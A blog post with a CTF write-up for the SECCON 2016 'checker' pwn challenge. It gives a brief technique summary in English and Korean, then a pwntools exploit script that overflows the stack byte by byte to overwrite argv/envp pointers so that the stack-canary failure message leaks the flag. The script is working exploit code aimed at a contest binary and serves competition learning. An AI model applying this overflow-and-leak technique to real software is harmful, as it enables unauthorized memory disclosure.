SECCON 2016 checker

Games/CTF 2016. 12. 12. 20:21

summary: leak flag in memory using argv[1] in stack_check_fail.  we need LIBC_FATAL_ERROR environment variable to get stderr from redirected network.

요약: argv[1] 포인터 덮어서, 스택카나리 체크시 flag 를 leak 하기.  LIBC_FATAL_ERROR 환경변수 세팅해줘야 stderr 를 볼수있음.


from pwn import *

context.arch = 'amd64' # i386 / arm


# recvuntil sendline, pack, recv, send

r = remote('checker.pwn.seccon.jp', 14726)

#r = process(['./checker'])

raw_input('attach')

# start pwn.


print r.recvuntil('NAME : ')

r.sendline('LIBC_FATAL_STDERR_=1')

print r.recvuntil('>> ')

# overwrite envp[1] to 0x601040


payload = 'A'*(0x188 + 6)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x188 + 5)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x188 + 4)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x188)

payload += pack(0x601040)

r.sendline(payload)

print r.recvuntil('>> ')


payload = 'A'*(0x180 + 7)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x180 + 6)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x180 + 5)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x180 + 4)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x180)

payload += pack(0x601040)

r.sendline(payload)

print r.recvuntil('>> ')


payload = 'A'*(0x178 + 7)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x178 + 6)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x178 + 5)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x178 + 4)

r.sendline(payload)

print r.recvuntil('>> ')

payload = 'A'*(0x178)

payload += pack(0x6010c0)

r.sendline(payload)

print r.recvuntil('>> ')





r.sendline('yes')


print r.recvuntil('FLAG : ')

raw_input()

r.sendline('fuck')



# get shell?

r.interactive()



'Games > CTF' 카테고리의 다른 글

DEFCON 2017 awsno writeup  (0) 2017.05.08
SECCON 2016 cheer_msg  (0) 2016.12.12
SECCON 2016 checker  (0) 2016.12.12
SECCON 2016 logger  (0) 2016.12.11
SECCON 2016 jumper  (0) 2016.12.11
SECCON 2016 chat  (0) 2016.12.11
Posted by daehee87

댓글을 달아 주세요